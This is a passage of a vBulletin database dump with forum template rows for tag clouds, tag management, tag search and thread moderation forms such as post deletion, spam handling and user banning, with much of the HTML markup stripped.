\r\n\r\n\r\n \r\n\r\n
    \r\n
    \" . construct_phrase(\"$vbphrase[these_are_the_x_most_used_thread_tags]\", \"$cloud[count]\") . \"
    \r\n $vbphrase[tag_cloud]\r\n
    $cloud[links]
    ', '\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    \r\n
    $vbphrase[these_are_the_x_most_used_thread_tags]
    \r\n $vbphrase[tag_cloud]\r\n
    $cloud[links]
    ', 'template', 1196699009, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'), (1633, -1, 'tag_cloud_box_search', '\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    \r\n
    \" . construct_phrase(\"$vbphrase[these_are_the_x_most_searched_thread_tags]\", \"$cloud[count]\") . \"
    \r\n $vbphrase[search_tag_cloud]\r\n
    $cloud[links]
    ', '\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    \r\n
    $vbphrase[these_are_the_x_most_searched_thread_tags]
    \r\n $vbphrase[search_tag_cloud]\r\n
    $cloud[links]
    ', 'template', 1196698999, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'), (1634, -1, 'tag_cloud_headinclude', '', '', 'template', 1196424223, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'), (1635, -1, 'tag_cloud_link', 'session->vars[\'sessionurl\'] . \"tag=$thistag[tagtext_url]\\\" class=\\\"tagcloudlink level$thistag[level]\\\">$thistag[tagtext] ', '$thistag[tagtext] ', 'template', 1196425664, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'), (1636, -1, 'tag_cloud_page', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $vbphrase[tags]\r\n\".(($show[\'inlinemod\']) ? (\"\") : (\"\")).\"\r\n$tag_cloud_headinclude\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\".(($tag_cloud) ? (\"\r\n $tag_cloud
    \r\n\") : (\"\")).\"\r\n\r\n
    \r\n\".(($GLOBALS[\'vbulletin\']->session->vars[\'sessionhash\']) ? (\"\r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n\") : (\"\")).\"\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    $vbphrase[search_by_tag]
    \r\n \r\n \r\n
    \r\n
    \r\n\r\n\".(($show[\'popups\']) ? (\"\r\n
    \r\n \r\n \r\n\") : (\"\")).\"\r\n\r\n$footer\r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$vboptions[bbtitle] - $vbphrase[tags]\r\n\r\n$tag_cloud_headinclude\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n $tag_cloud
    \r\n
    \r\n\r\n
    \r\n\r\n \r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    $vbphrase[search_by_tag]
    \r\n \r\n \r\n
    \r\n
    \r\n\r\n\r\n
    \r\n \r\n \r\n
    \r\n\r\n$footer\r\n\r\n\r\n', 'template', 1208876655, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'), (1637, -1, 'tag_edit', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $threadinfo[title] - $vbphrase[tag_management]\r\n\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\".(($show[\'errors\']) ? (\"\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    $vbphrase[errors]
    $errorlist
    \r\n
    \r\n\") : (\"\")).\"\r\n\r\n
    \r\nsession->vars[\'sessionhash\'] . \"\\\" />\r\nuserinfo[\'securitytoken\'] . \"\\\" />\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    \r\n $vbphrase[thread]: session->vars[\'sessionurl\'] . \"t=$threadinfo[threadid]\\\">$threadinfo[title]\r\n $vbphrase[tag_management]\r\n
    \r\n
    \r\n
    \r\n
    \r\n $vbphrase[tags]\r\n
    \r\n \".(($tag_manage_options) ? (\"\r\n
    $vbphrase[uncheck_tag_remove_bold_you]
    \r\n
      \r\n $tag_manage_options\r\n
    \r\n
    \r\n \") : (\"\")).\"\r\n\r\n
    \r\n \".(($show[\'add_option\']) ? (\"
    text
    \") : (\"\")).\"\r\n \r\n
    \r\n\r\n \".(($show[\'add_option\']) ? (\"\r\n
    $vbphrase[add_tags] ($vbphrase[separate_tags_using_comma])
    \r\n
    \r\n \".(($show[\'tag_limit_phrase\']) ? (\"\r\n \".((!$tags_remain) ? (\"\r\n $vbphrase[cannot_add_tags_remove_first]\r\n \") : (\"\r\n \" . construct_phrase(\"$vbphrase[you_may_add_x_tags_to_thread]\", \"$tags_remain\") . \"\r\n \")).\"\r\n \") : (\"\")).\"\r\n $vbphrase[tags_visible_all_users]\r\n \") : (\"\")).\"\r\n
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n\r\n\".(($show[\'popups\']) ? (\"\r\n
    \r\n \r\n \r\n\") : (\"\")).\"\r\n\r\n$footer\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$vboptions[bbtitle] - $threadinfo[title] - $vbphrase[tag_management]\r\n\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    $vbphrase[errors]
    $errorlist
    \r\n
    \r\n
    \r\n\r\n
    \r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    \r\n $vbphrase[thread]: $threadinfo[title]\r\n $vbphrase[tag_management]\r\n
    \r\n
    \r\n
    \r\n
    \r\n $vbphrase[tags]\r\n
    \r\n \r\n
    $vbphrase[uncheck_tag_remove_bold_you]
    \r\n
      \r\n $tag_manage_options\r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n
    text
    \r\n \r\n
    \r\n\r\n \r\n
    $vbphrase[add_tags] ($vbphrase[separate_tags_using_comma])
    \r\n
    \r\n \r\n \r\n $vbphrase[cannot_add_tags_remove_first]\r\n \r\n $vbphrase[you_may_add_x_tags_to_thread]\r\n \r\n \r\n $vbphrase[tags_visible_all_users]\r\n
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n\r\n\r\n
    \r\n \r\n \r\n
    \r\n\r\n$footer\r\n\r\n', 'template', 1211458083, 'vBulletin Solutions', '3.7.1', 'vbulletin'), (1638, -1, 'tag_edit_ajax', '
    \r\nsession->vars[\'sessionhash\'] . \"\\\" />\r\nuserinfo[\'securitytoken\'] . \"\\\" />\r\n\r\n\r\n\r\n
    \r\n
    \r\n $vbphrase[tags]\r\n
    \r\n \".(($tag_manage_options) ? (\"\r\n
    $vbphrase[uncheck_tag_remove_bold_you]
    \r\n
      \r\n $tag_manage_options\r\n
    \r\n
    \r\n \") : (\"\")).\"\r\n\r\n\r\n
    \r\n \".(($show[\'add_option\']) ? (\"
    text
    \") : (\"\")).\"\r\n \\\"\\\"\r\n \r\n \r\n
    \r\n\r\n \".(($show[\'add_option\']) ? (\"\r\n
    $vbphrase[add_tags] ($vbphrase[separate_tags_using_comma])
    \r\n
    \r\n \".(($show[\'tag_limit_phrase\']) ? (\"\r\n \".((!$tags_remain) ? (\"\r\n $vbphrase[cannot_add_tags_remove_first]\r\n \") : (\"\r\n \" . construct_phrase(\"$vbphrase[you_may_add_x_tags_to_thread]\", \"$tags_remain\") . \"\r\n \")).\"\r\n $vbphrase[tags_visible_all_users]\r\n \") : (\"\")).\"\r\n \") : (\"\")).\"\r\n
    \r\n
    \r\n
    \r\n
    \r\n\r\n\".(($show[\'popups\']) ? (\"\r\n
    \r\n\") : (\"\")).\"', '
    \r\n\r\n\r\n\r\n\r\n\r\n
    \r\n
    \r\n $vbphrase[tags]\r\n
    \r\n \r\n
    $vbphrase[uncheck_tag_remove_bold_you]
    \r\n
      \r\n $tag_manage_options\r\n
    \r\n
    \r\n
    \r\n\r\n\r\n
    \r\n
    text
    \r\n \"\"\r\n \r\n \r\n
    \r\n\r\n \r\n
    $vbphrase[add_tags] ($vbphrase[separate_tags_using_comma])
    \r\n
    \r\n \r\n \r\n $vbphrase[cannot_add_tags_remove_first]\r\n \r\n $vbphrase[you_may_add_x_tags_to_thread]\r\n \r\n $vbphrase[tags_visible_all_users]\r\n \r\n
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n\r\n\r\n
    \r\n
    ', 'template', 1209387965, 'vBulletin Solutions', '3.7.0', 'vbulletin'), (1639, -1, 'tag_managebit', '
  • \r\n\".(($show[\'tag_checkbox\']) ? (\"\r\n \r\n \r\n\") : (\"\r\n \r\n \")).\"\r\n
  • ', '
  • mine\" title=\"$vbphrase[added_by_x]\">\r\n\r\n \r\n \r\n\r\n \r\n \r\n
  • ', 'template', 1196586065, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'), (1640, -1, 'tag_search', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - \" . construct_phrase(\"$vbphrase[threads_tagged_with_x_title]\", \"$tag[tagtext]\") . \"\".(($pagenumber>1) ? (\" - \" . construct_phrase(\"$vbphrase[page_x]\", \"$pagenumber\") . \"\") : (\"\")).\"\r\n\".(($show[\'inlinemod\']) ? (\"\") : (\"\")).\"\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\".(($pagenav) ? (\"\r\n\r\n\r\n \r\n\r\n
    $pagenav
    \r\n\") : (\"\")).\"\r\n\r\n
    \r\n\r\nsession->vars[\'sessionhash\'] . \"\\\" />\r\nuserinfo[\'securitytoken\'] . \"\\\" />\r\n\r\n\r\n\r\n \r\n\r\n\r\n \".(($show[\'threadicons\']) ? (\"\r\n \r\n \") : (\"\r\n \r\n \")).\"\r\n \r\n \r\n \r\n \r\n \r\n\r\n \".(($show[\'inlinemod\']) ? (\"\r\n \".(($show[\'popups\']) ? (\"\r\n \r\n \") : (\"\r\n \r\n \")).\"\r\n \") : (\"\")).\"\r\n\r\n\r\n$threadbits\r\n\r\n
    \" . construct_phrase(\"$vbphrase[threads_tagged_with_x]\", \"$tag[tagtext]\") . \"
      $vbphrase[thread] / $vbphrase[thread_starter]$vbphrase[last_post]$vbphrase[replies]$vbphrase[views]$vbphrase[forum] \r\n \r\n
    \r\n\r\n\".(($show[\'ajax_js\']) ? (\"\r\n \r\n \r\n\") : (\"\")).\"\r\n\r\n\r\n\".(($pagenav) ? (\"\r\n\r\n\r\n \".(($pagenav) ? (\"\") : (\"\")).\"\r\n\r\n
    $pagenav
    \r\n\") : (\"\")).\"\r\n\r\n\".(($show[\'inlinemod\']) ? (\"\r\n\r\n\r\n \r\n\r\n
    \r\n
    \r\n $vbphrase[moderation]
    \r\n \r\n \r\n
    \r\n
    \r\n\") : (\"\")).\"\r\n\r\n
    \r\n\r\n\".(($show[\'inlinemod\'] AND $show[\'popups\']) ? (\"\r\n
    \r\n $threadadmin_imod_menu\r\n
    \r\n\") : (\"\")).\"\r\n\r\n$footer\r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$vboptions[bbtitle] - <phrase 1=\"$tag[tagtext]\">$vbphrase[threads_tagged_with_x_title]</phrase><if condition=\"$pagenumber>1\"> - <phrase 1=\"$pagenumber\">$vbphrase[page_x]</phrase></if>\r\n\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n\r\n\r\n \r\n\r\n
    $pagenav
    \r\n
    \r\n\r\n
    \r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n\r\n\r\n$threadbits\r\n\r\n
    $vbphrase[threads_tagged_with_x]
      $vbphrase[thread] / $vbphrase[thread_starter]$vbphrase[last_post]$vbphrase[replies]$vbphrase[views]$vbphrase[forum] \r\n \r\n
    \r\n\r\n\r\n \r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n
    $pagenav
    \r\n
    \r\n\r\n\r\n\r\n\r\n \r\n\r\n
    \r\n
    \r\n $vbphrase[moderation]
    \r\n \r\n \r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n\r\n\r\n
    \r\n $threadadmin_imod_menu\r\n
    \r\n
    \r\n\r\n$footer\r\n\r\n\r\n', 'template', 1231254527, 'vBulletin Solutions', '3.8.0 Release Candidate 3', 'vbulletin'), (1641, -1, 'THREADADMIN', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $pagetitle\r\n\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n$HTML\r\n\r\n$footer\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$vboptions[bbtitle] - $pagetitle\r\n\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n$HTML\r\n\r\n$footer\r\n\r\n', 'template', 1195729862, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'), (1642, -1, 'threadadmin_authenticate', '
    \r\n \r\n \r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n \r\n \r\n \r\n \r\n $postvars\r\n\r\n $vbphrase[login_to_reauthenticate]\r\n\r\n
    \r\n \r\n
    \r\n \r\n \r\n
    \r\n
    \r\n
    \r\n', '
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n $postvars\r\n\r\n $vbphrase[login_to_reauthenticate]\r\n\r\n
    \r\n \r\n
    \r\n \r\n \r\n
    \r\n
    \r\n
    \r\n', 'template', 1212401106, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'), (1643, -1, 'threadadmin_copyposts', '
    \r\nsession->vars[\'sessionhash\'] . \"\\\" />\r\nuserinfo[\'securitytoken\'] . \"\\\" />\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    $vbphrase[copy_posts]
    \r\n
    \r\n
    \r\n\r\n\r\n
    \r\n $vbphrase[copy_posts_to_new_thread]\r\n
    \r\n\r\n
    $vbphrase[destination_forum]
    \r\n
    \r\n
    $vbphrase[title]
    \r\n options[\'titlemaxchars\'] . \"\\\" />
    \r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[copy_posts_to_existing_thread]\r\n
    \r\n
    $vbphrase[copy_posts_note]
    \r\n
    $vbphrase[url_of_thread_to_be_merged]
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[notes]\r\n
    \r\n\r\n
    \" . construct_phrase(\"$vbphrase[copying_x_posts_from_y_threads_in_z_forums]\", \"$postcount\", \"$threadcount\", \"$forumcount\") . \"
    \r\n
    $vbphrase[you_must_have_the_required_permission]
    \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n \r\n \r\n
    \r\n
    \r\n\r\n
    ', '
    \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    $vbphrase[copy_posts]
    \r\n
    \r\n
    \r\n\r\n\r\n
    \r\n $vbphrase[copy_posts_to_new_thread]\r\n
    \r\n\r\n
    $vbphrase[destination_forum]
    \r\n
    \r\n
    $vbphrase[title]
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[copy_posts_to_existing_thread]\r\n
    \r\n
    $vbphrase[copy_posts_note]
    \r\n
    $vbphrase[url_of_thread_to_be_merged]
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[notes]\r\n
    \r\n\r\n
    $vbphrase[copying_x_posts_from_y_threads_in_z_forums]
    \r\n
    $vbphrase[you_must_have_the_required_permission]
    \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n \r\n \r\n
    \r\n
    \r\n\r\n
    ', 'template', 1212659830, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'), (1644, -1, 'threadadmin_deleteposts', '
    \r\nsession->vars[\'sessionhash\'] . \"\\\" />\r\nuserinfo[\'securitytoken\'] . \"\\\" />\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    $vbphrase[delete_posts]
    \r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[deletion_options]\r\n\r\n
    \r\n\r\n \".(($show[\'deleteoption\']) ? (\"
    $vbphrase[how_would_you_like_to_delete]
    \") : (\"\")).\"\r\n \".(($show[\'deleteposts\']) ? (\"\r\n
    \r\n \r\n
    \\\"\\\"\r\n
    \r\n \") : (\"\")).\"\r\n\r\n \".(($show[\'removeposts\']) ? (\"\r\n
    \r\n \r\n
    \r\n \") : (\"\")).\"\r\n\r\n \".(($show[\'deleteposts\']) ? (\"\r\n
    \r\n $vbphrase[reason_for_deletion]:
    \r\n \r\n
    \r\n \") : (\"\")).\"\r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[notes]\r\n
    \r\n
    \" . construct_phrase(\"$vbphrase[deleting_x_posts_from_y_threads_in_z_forums]\", \"$postcount\", \"$threadcount\", \"$forumcount\") . \"
    \r\n \".(($show[\'firstpost\']) ? (\"
    $vbphrase[deleting_the_first_post]
    \") : (\"\")).\"\r\n
    \r\n
    \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n \r\n \r\n
    \r\n
    \r\n\r\n
    ', '
    \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    $vbphrase[delete_posts]
    \r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[deletion_options]\r\n\r\n
    \r\n\r\n
    $vbphrase[how_would_you_like_to_delete]
    \r\n \r\n
    \r\n \r\n
    \"\"\r\n
    \r\n
    \r\n\r\n \r\n
    \r\n \r\n
    \r\n
    \r\n\r\n \r\n
    \r\n $vbphrase[reason_for_deletion]:
    \r\n \r\n
    \r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[notes]\r\n
    \r\n
    $vbphrase[deleting_x_posts_from_y_threads_in_z_forums]
    \r\n
    $vbphrase[deleting_the_first_post]
    \r\n
    \r\n
    \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n \r\n \r\n
    \r\n
    \r\n\r\n
    ', 'template', 1208875931, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'), (1645, -1, 'threadadmin_deletethread', '
    \r\nsession->vars[\'sessionhash\'] . \"\\\" />\r\nuserinfo[\'securitytoken\'] . \"\\\" />\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n\r\n\r\n \r\n\r\n
    $vbphrase[delete_thread]
    $vbphrase[title]: $threadinfo[prefix_plain_html] $threadinfo[title]
    \r\n
    \r\n
    \r\n\r\n\r\n
    \r\n $vbphrase[deletion_options]\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[how_would_you_like_to_delete]
    \r\n \".(($show[\'softdelete\']) ? (\"
    \r\n
    \r\n
    \\\"\\\"
    \r\n
    \") : (\"\")).\"\r\n \".(($show[\'harddelete\']) ? (\"
    \r\n \r\n
    \") : (\"\")).\"\r\n
    \r\n $vbphrase[reason_for_deletion]:
    \r\n \r\n
    \r\n
    \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n \r\n \r\n
    \r\n
    \r\n\r\n
    ', '
    \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n\r\n\r\n \r\n\r\n
    $vbphrase[delete_thread]
    $vbphrase[title]: $threadinfo[prefix_plain_html] $threadinfo[title]
    \r\n
    \r\n
    \r\n\r\n\r\n
    \r\n $vbphrase[deletion_options]\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[how_would_you_like_to_delete]
    \r\n
    \r\n
    \r\n
    \"\"
    \r\n
    \r\n
    \r\n \r\n
    \r\n
    \r\n $vbphrase[reason_for_deletion]:
    \r\n \r\n
    \r\n
    \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n \r\n \r\n
    \r\n
    \r\n\r\n
    ', 'template', 1216908550, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'), (1646, -1, 'threadadmin_deletethreads', '
    \r\nsession->vars[\'sessionhash\'] . \"\\\" />\r\nuserinfo[\'securitytoken\'] . \"\\\" />\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    $vbphrase[delete_threads]
    \r\n
    \r\n
    \r\n\r\n\r\n
    \r\n $vbphrase[deletion_options]\r\n
    \r\n\r\n \".(($show[\'deleteoption\']) ? (\"
    $vbphrase[how_would_you_like_to_delete]
    \") : (\"\")).\"\r\n\r\n \".(($show[\'deletethreads\']) ? (\"\r\n
    \r\n \r\n
    \\\"\\\"\r\n
    \r\n \") : (\"\")).\"\r\n\r\n \".(($show[\'removethreads\']) ? (\"\r\n
    \r\n \r\n
    \r\n \") : (\"\")).\"\r\n\r\n \".(($show[\'deletethreads\']) ? (\"\r\n
    \r\n $vbphrase[reason_for_deletion]:
    \r\n \r\n
    \r\n \") : (\"\")).\"\r\n\r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[notes]\r\n
    \r\n
    \" . construct_phrase(\"$vbphrase[deleting_x_threads_from_y_forums]\", \"$threadcount\", \"$forumcount\") . \"
    \r\n
    \r\n
    \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n \r\n \r\n
    \r\n
    \r\n\r\n
    ', '
    \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    $vbphrase[delete_threads]
    \r\n
    \r\n
    \r\n\r\n\r\n
    \r\n $vbphrase[deletion_options]\r\n
    \r\n\r\n
    $vbphrase[how_would_you_like_to_delete]
    \r\n\r\n \r\n
    \r\n \r\n
    \"\"\r\n
    \r\n
    \r\n\r\n \r\n
    \r\n \r\n
    \r\n
    \r\n\r\n \r\n
    \r\n $vbphrase[reason_for_deletion]:
    \r\n \r\n
    \r\n
    \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[notes]\r\n
    \r\n
    $vbphrase[deleting_x_threads_from_y_forums]
    \r\n
    \r\n
    \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n \r\n \r\n
    \r\n
    \r\n\r\n
    ', 'template', 1208875901, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'), (1647, -1, 'threadadmin_easyspam', '
    \r\nsession->vars[\'sessionhash\'] . \"\\\" />\r\nuserinfo[\'securitytoken\'] . \"\\\" />\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    $vbphrase[spam_management]
    \r\n
    \r\n
    \r\n
    \r\n \".(($threadids) ? (\"\r\n \r\n \r\n \r\n $threadid_hiddenfields\r\n $vbphrase[delete_threads_as_spam]\r\n
    \r\n
    \" . construct_phrase(\"$vbphrase[deleting_x_threads_from_y_forums]\", \"$threadcount\", \"$forumcount\") . \"
    \r\n
    $vbphrase[only_first_post_is_spam]
    \r\n \r\n \".(($show[\'delete_others_option\'] OR $show[\'akismet_option\']) ? (\"\r\n
      \r\n \".(($show[\'delete_others_option\']) ? (\"
    • \") : (\"\")).\"\r\n \".(($show[\'akismet_option\']) ? (\"
    • \") : (\"\")).\"\r\n
    \r\n \") : (\"\")).\"\r\n
    \r\n \") : (\"\r\n \r\n \r\n \r\n \r\n $postid_hiddenfields\r\n $vbphrase[delete_posts_as_spam]\r\n
    \r\n
    \" . construct_phrase(\"$vbphrase[deleting_x_posts_from_y_threads_in_z_forums]\", \"$postcount\", \"$threadcount\", \"$forumcount\") . \"
    \r\n \r\n \".(($show[\'delete_others_option\'] OR $show[\'akismet_option\']) ? (\"\r\n
      \r\n \".(($show[\'delete_others_option\']) ? (\"
    • \") : (\"\")).\"\r\n \".(($show[\'akismet_option\']) ? (\"
    • \") : (\"\")).\"\r\n
    \r\n \") : (\"\")).\"\r\n
    \r\n \")).\"\r\n
    \r\n \r\n \r\n
    \r\n $vbphrase[deletion_options]\r\n
    \r\n \".(($show[\'deleteoption\']) ? (\"\r\n
    $vbphrase[how_would_you_like_to_delete]
    \r\n \") : (\"\")).\"\r\n \r\n \".(($show[\'deleteitems\']) ? (\"\r\n
    \r\n \r\n
    \\\"\\\"\r\n
    \r\n \") : (\"\")).\"\r\n \r\n \".(($show[\'removeitems\']) ? (\"\r\n
    \r\n \r\n
    \r\n \") : (\"\")).\"\r\n \r\n \".(($show[\'deleteitems\']) ? (\"\r\n
    \r\n $vbphrase[reason_for_deletion]:
    \r\n \r\n
    \r\n \") : (\"\")).\"\r\n
    \r\n
    \r\n \r\n \r\n \r\n \".(($show[\'punitive_action\']) ? (\"\r\n
    \r\n $vbphrase[punitive_action]\r\n
    \r\n
    \" . construct_phrase(\"$vbphrase[do_what_with_affected_users]\", \"$usercount\") . \"
    \r\n
      \r\n
    • \r\n
    • \r\n
    \r\n
    \r\n
    \r\n \") : (\"\")).\"\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n
    \r\n $vbphrase[affected_users]\r\n
    \r\n
    $vbphrase[affected_users_are]
    \r\n \".(($show[\'users\']) ? (\"\r\n
      $users
    \r\n \") : (\"\r\n
    1. $vbphrase[n_a]
    \r\n \")).\"\r\n
    \r\n
    \r\n
    \r\n
    \r\n $vbphrase[affected_ips]\r\n
    \r\n
    $vbphrase[affected_ips_are]
    \r\n \".(($show[\'ips\']) ? (\"\r\n
      $ips
    \r\n \") : (\"\r\n
    1. $vbphrase[n_a]
    \r\n \")).\"\r\n
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n \r\n
    \r\n
    \r\n\r\n
    ', '
    \r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    $vbphrase[spam_management]
    \r\n
    \r\n
    \r\n
    \r\n \r\n \r\n \r\n \r\n $threadid_hiddenfields\r\n $vbphrase[delete_threads_as_spam]\r\n
    \r\n
    $vbphrase[deleting_x_threads_from_y_forums]
    \r\n
    $vbphrase[only_first_post_is_spam]
    \r\n \r\n \r\n
      \r\n
    • \r\n
    • \r\n
    \r\n
    \r\n
    \r\n \r\n \r\n \r\n \r\n \r\n $postid_hiddenfields\r\n $vbphrase[delete_posts_as_spam]\r\n
    \r\n
    $vbphrase[deleting_x_posts_from_y_threads_in_z_forums]
    \r\n \r\n \r\n
      \r\n
    • \r\n
    • \r\n
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n \r\n \r\n
    \r\n $vbphrase[deletion_options]\r\n
    \r\n \r\n
    $vbphrase[how_would_you_like_to_delete]
    \r\n
    \r\n \r\n \r\n
    \r\n \r\n
    \"\"\r\n
    \r\n
    \r\n \r\n \r\n
    \r\n \r\n
    \r\n
    \r\n \r\n \r\n
    \r\n $vbphrase[reason_for_deletion]:
    \r\n \r\n
    \r\n
    \r\n
    \r\n
    \r\n \r\n \r\n \r\n \r\n
    \r\n $vbphrase[punitive_action]\r\n
    \r\n
    $vbphrase[do_what_with_affected_users]
    \r\n
      \r\n
    • \r\n
    • \r\n
    \r\n
    \r\n
    \r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n
    \r\n $vbphrase[affected_users]\r\n
    \r\n
    $vbphrase[affected_users_are]
    \r\n \r\n
      $users
    \r\n \r\n
    1. $vbphrase[n_a]
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n $vbphrase[affected_ips]\r\n
    \r\n
    $vbphrase[affected_ips_are]
    \r\n \r\n
      $ips
    \r\n \r\n
    1. $vbphrase[n_a]
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n \r\n
    \r\n
    \r\n\r\n
    ', 'template', 1229517663, 'vBulletin Solutions', '3.8.0 Release Candidate 2', 'vbulletin'), (1648, -1, 'threadadmin_easyspam_ban', '\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    \r\n $vbphrase[ban_user]\r\n
    \r\n\r\n
    \r\n\r\n
    \r\n\r\n\r\n
    \r\n $vbphrase[ban_options]\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[place_ban_users_in]
    $vbphrase[lift_ban]\r\n \r\n
    $vbphrase[ban_reason]
    \r\n
    \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n \r\n \r\n
    \r\n\r\n
    ', '\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    \r\n $vbphrase[ban_user]\r\n
    \r\n\r\n
    \r\n\r\n
    \r\n\r\n\r\n
    \r\n $vbphrase[ban_options]\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[place_ban_users_in]
    $vbphrase[lift_ban]\r\n \r\n
    $vbphrase[ban_reason]
    \r\n
    \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n \r\n \r\n
    \r\n\r\n
    ', 'template', 1220003853, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'), (1649, -1, 'threadadmin_easyspam_confirm', '
